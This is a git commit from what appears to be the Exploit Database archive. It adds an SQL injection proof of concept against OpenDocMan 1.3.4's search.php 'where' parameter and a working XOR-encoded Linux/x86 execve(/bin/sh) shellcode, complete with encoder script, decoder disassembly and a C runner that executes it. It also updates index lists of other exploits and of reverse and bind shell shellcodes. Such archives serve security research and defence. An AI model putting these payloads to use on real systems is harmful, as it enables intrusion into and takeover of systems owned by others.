DB: 2019-03-06
2 changes to exploits/shellcodes STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2) Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload) Splunk Enterprise 7.2.4 - Custom App Remote Command Execution (Persistent Backdoor / Custom Binary) elFinder 2.1.47 - Command Injection vulnerability in the PHP connector elFinder 2.1.47 - 'PHP connector' Command Injection OpenDocMan 1.3.4 - 'search.php where' SQL Injection Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes) Linux/x86 - NOT Encoder / Decoder - execve(/bin/sh) Shellcode (44 bytes) Linux/x86 - XOR Encoder / Decoder execve() /bin/sh Shellcode (45 bytes)
This commit is contained in:
Offensive Security
parent
a37e3008e5
commit
dd4f02248d
4 changed files with 123 additions and 4 deletions
22
exploits/php/webapps/46500.txt
Normal file
22
exploits/php/webapps/46500.txt
Normal file
|
|
@ -0,0 +1,22 @@
|
|||
===========================================================================================
|
||||
# Exploit Title: OpenDocMan 1.3.4 - ’where’ SQL Injection
|
||||
# CVE: N/A
|
||||
# Date: 05/03/2019
|
||||
# Exploit Author: Mehmet EMIROGLU
|
||||
# Vendor Homepage: https://sourceforge.net/projects/opendocman/files/
|
||||
# Software Link: https://sourceforge.net/projects/opendocman/files/
|
||||
# Version: v1.3.4
|
||||
# Category: Webapps
|
||||
# Tested on: Wamp64, @Win
|
||||
# Software description: OpenDocMan is a web based document management
|
||||
system (DMS) written in PHP designed
|
||||
to comply with ISO 17025 and OIE standard for document management.
|
||||
It features fine grained control of access to files, and automated
|
||||
install and upgrades.
|
||||
===========================================================================================
|
||||
# POC - SQLi
|
||||
# Parameters : where
|
||||
# Attack Pattern : %2527
|
||||
# GET Request :
|
||||
http://localhost/opendocman/search.php?submit=submit&sort_by=id&where=[SQL Inject Here]&sort_order=asc&keyword=Training Manual&exact_phrase=on
|
||||
===========================================================================================
|
||||
|
|
@ -10239,7 +10239,7 @@ id,file,description,date,author,type,platform,port
|
|||
45626,exploits/windows/local/45626.rb,"VLC Media Player - MKV Use-After-Free (Metasploit)",2018-10-16,Metasploit,local,windows,
|
||||
45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86,
|
||||
45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux,
|
||||
45496,exploits/windows/local/45496.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)",2019-03-04,"Ivan Ivanovic",local,windows,
|
||||
45496,exploits/windows/local/45496.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)",2018-09-15,"Ivan Ivanovic",local,windows,
|
||||
45653,exploits/windows/local/45653.rb,"Microsoft Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows,
|
||||
45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows,
|
||||
45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows,
|
||||
|
|
@ -40442,7 +40442,7 @@ id,file,description,date,author,type,platform,port
|
|||
45487,exploits/hardware/webapps/45487.txt,"RICOH MP 305+ Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
|
||||
45490,exploits/hardware/webapps/45490.txt,"RICOH MP C406Z Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
|
||||
45491,exploits/php/webapps/45491.txt,"Joomla! Component Responsive Portfolio 1.6.1 - 'filter_order_Dir' SQL Injection",2018-09-25,AkkuS,webapps,php,
|
||||
46487,exploits/windows/webapps/46487.py,"Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)",2019-03-04,"Matteo Malvica",webapps,windows,8000
|
||||
46487,exploits/windows/webapps/46487.py,"Splunk Enterprise 7.2.4 - Custom App Remote Command Execution (Persistent Backdoor / Custom Binary)",2019-03-04,"Matteo Malvica",webapps,windows,8000
|
||||
45498,exploits/windows/webapps/45498.txt,"iWay Data Quality Suite Web Console 10.6.1.ga - XML External Entity Injection",2018-09-27,"Sureshbabu Narvaneni",webapps,windows,
|
||||
45499,exploits/java/webapps/45499.txt,"ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting",2018-09-27,"Ismail Tasdelen",webapps,java,
|
||||
45500,exploits/windows_x86-64/webapps/45500.txt,"Rausoft ID.prove 2.95 - 'Username' SQL injection",2018-09-27,"Ilya Timchenko",webapps,windows_x86-64,
|
||||
|
|
@ -40941,9 +40941,10 @@ id,file,description,date,author,type,platform,port
|
|||
46468,exploits/linux/webapps/46468.rb,"Usermin 1.750 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,linux,
|
||||
46471,exploits/php/webapps/46471.rb,"Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,php,
|
||||
46480,exploits/php/webapps/46480.txt,"CMSsite 1.0 - Multiple Cross-Site Request Forgery",2019-03-04,"Mr Winst0n",webapps,php,80
|
||||
46481,exploits/php/webapps/46481.py,"elFinder 2.1.47 - Command Injection vulnerability in the PHP connector",2019-03-04,q3rv0,webapps,php,80
|
||||
46481,exploits/php/webapps/46481.py,"elFinder 2.1.47 - 'PHP connector' Command Injection",2019-03-04,q3rv0,webapps,php,80
|
||||
46494,exploits/windows/webapps/46494.py,"MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal",2019-03-04,0v3rride,webapps,windows,
|
||||
46495,exploits/php/webapps/46495.txt,"Bolt CMS 3.6.4 - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80
|
||||
46496,exploits/php/webapps/46496.txt,"Craft CMS 3.1.12 Pro - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80
|
||||
46497,exploits/php/webapps/46497.txt,"WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities",2019-03-04,ed0x21son,webapps,php,80
|
||||
46498,exploits/hardware/webapps/46498.txt,"Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting",2019-03-04,Tauco,webapps,hardware,80
|
||||
46500,exploits/php/webapps/46500.txt,"OpenDocMan 1.3.4 - 'search.php where' SQL Injection",2019-03-05,"Mehmet EMIROGLU",webapps,php,80
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
|
|
@ -843,7 +843,7 @@ id,file,description,date,author,type,platform
|
|||
43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64
|
||||
43955,shellcodes/generator/43955.py,"Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)",2017-12-19,0x4ndr3,shellcode,generator
|
||||
43956,shellcodes/linux_x86-64/43956.c,"Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode",2018-02-02,0x4ndr3,shellcode,linux_x86-64
|
||||
46493,shellcodes/linux_x86/46493.c,"Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes)",2019-03-04,"Daniele Votta",shellcode,linux_x86
|
||||
46493,shellcodes/linux_x86/46493.c,"Linux/x86 - NOT Encoder / Decoder - execve(/bin/sh) Shellcode (44 bytes)",2019-03-04,"Daniele Votta",shellcode,linux_x86
|
||||
44143,shellcodes/arm/44143.s,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)",2018-02-19,rtmcx,shellcode,arm
|
||||
42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
|
||||
41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
|
||||
|
|
@ -948,3 +948,4 @@ id,file,description,date,author,type,platform
|
|||
46395,shellcodes/macos/46395.c,"macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
|
||||
46396,shellcodes/macos/46396.c,"macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
|
||||
46397,shellcodes/macos/46397.c,"macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
|
||||
46499,shellcodes/linux_x86/46499.c,"Linux/x86 - XOR Encoder / Decoder execve() /bin/sh Shellcode (45 bytes)",2019-03-05,"Daniele Votta",shellcode,linux_x86
|
||||
|
|
|
|||
|
95
shellcodes/linux_x86/46499.c
Normal file
95
shellcodes/linux_x86/46499.c
Normal file
|
|
@ -0,0 +1,95 @@
|
|||
/*
|
||||
; Date: 26/02/2019
|
||||
; XOR-Encoder.py
|
||||
; Author: Daniele Votta
|
||||
; Description: This program encode shellcode with XOR technique.
|
||||
; Tested on: i686 GNU/Linux
|
||||
; Shellcode Length:25
|
||||
|
||||
#!/usr/bin/python
|
||||
# Python XOR Encoder
|
||||
|
||||
# Execve /bin/sh
|
||||
shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
|
||||
|
||||
encoded = ""
|
||||
encoded2 = ""
|
||||
|
||||
print 'Encoded shellcode...'
|
||||
|
||||
for x in bytearray(shellcode):
|
||||
# XOR Encoding
|
||||
y = x^0xAA
|
||||
encoded += '\\x'
|
||||
encoded += '%02x' % y
|
||||
encoded2 += '0x'
|
||||
encoded2 += '%02x,' % y
|
||||
|
||||
print encoded +"\n"
|
||||
print encoded2
|
||||
print 'Len: %d' % len(bytearray(shellcode))
|
||||
*/
|
||||
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
|
||||
/*
|
||||
|
||||
; XOR-Decoder.asm
|
||||
; Author: Daniele Votta
|
||||
; Description: This program decode shellcode with XOR technique.
|
||||
; Tested on: i686 GNU/Linux
|
||||
; Shellcode Length:45
|
||||
; JMP | CALL | POP | Techniques
|
||||
|
||||
XOR-Decoder: file format elf32-i386
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
08048080 <_start>:
|
||||
8048080: eb 0d jmp 804808f <call_decoder>
|
||||
|
||||
08048082 <decoder>:
|
||||
8048082: 5e pop esi
|
||||
8048083: 31 c9 xor ecx,ecx
|
||||
8048085: b1 19 mov cl,0x19
|
||||
|
||||
08048087 <decode>:
|
||||
8048087: 80 36 aa xor BYTE PTR [esi],0xaa
|
||||
804808a: 46 inc esi
|
||||
804808b: e2 fa loop 8048087 <decode>
|
||||
804808d: eb 05 jmp 8048094 <Shellcode>
|
||||
|
||||
0804808f <call_decoder>:
|
||||
804808f: e8 ee ff ff ff call 8048082 <decoder>
|
||||
|
||||
08048094 <Shellcode>:
|
||||
8048094: 9b fwait
|
||||
8048095: 6a fa push 0xfffffffa
|
||||
8048097: c2 85 85 ret 0x8585
|
||||
804809a: d9 c2 fld st(2)
|
||||
804809c: c2 85 c8 ret 0xc885
|
||||
804809f: c3 ret
|
||||
80480a0: c4 23 les esp,FWORD PTR [ebx]
|
||||
80480a2: 49 dec ecx
|
||||
80480a3: fa cli
|
||||
80480a4: 23 48 f9 and ecx,DWORD PTR [eax-0x7]
|
||||
80480a7: 23 4b 1a and ecx,DWORD PTR [ebx+0x1a]
|
||||
80480aa: a1 .byte 0xa1
|
||||
80480ab: 67 addr16
|
||||
80480ac: 2a .byte 0x2a
|
||||
[+] Extract Shellcode ...
|
||||
"\xeb\x0d\x5e\x31\xc9\xb1\x19\x80\x36\xaa\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x9b\x6a\xfa\xc2\x85\x85\xd9\xc2\xc2\x85\xc8\xc3\xc4\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a"
|
||||
======================= POC Daniele Votta =======================
|
||||
*/
|
||||
|
||||
/* XOR Encoded (0xAA) Execve /bin/sh */
|
||||
unsigned char code[] = \
|
||||
"\xeb\x0d\x5e\x31\xc9\xb1\x19\x80\x36\xaa\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x9b\x6a\xfa\xc2\x85\x85\xd9\xc2\xc2\x85\xc8\xc3\xc4\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a";
|
||||
|
||||
int main()
|
||||
{
|
||||
printf("Shellcode Length: %d\n", strlen(code));
|
||||
int (*ret)() = (int(*)())code;
|
||||
ret();
|
||||
}
|
||||
Loading…
Add table
Reference in a new issue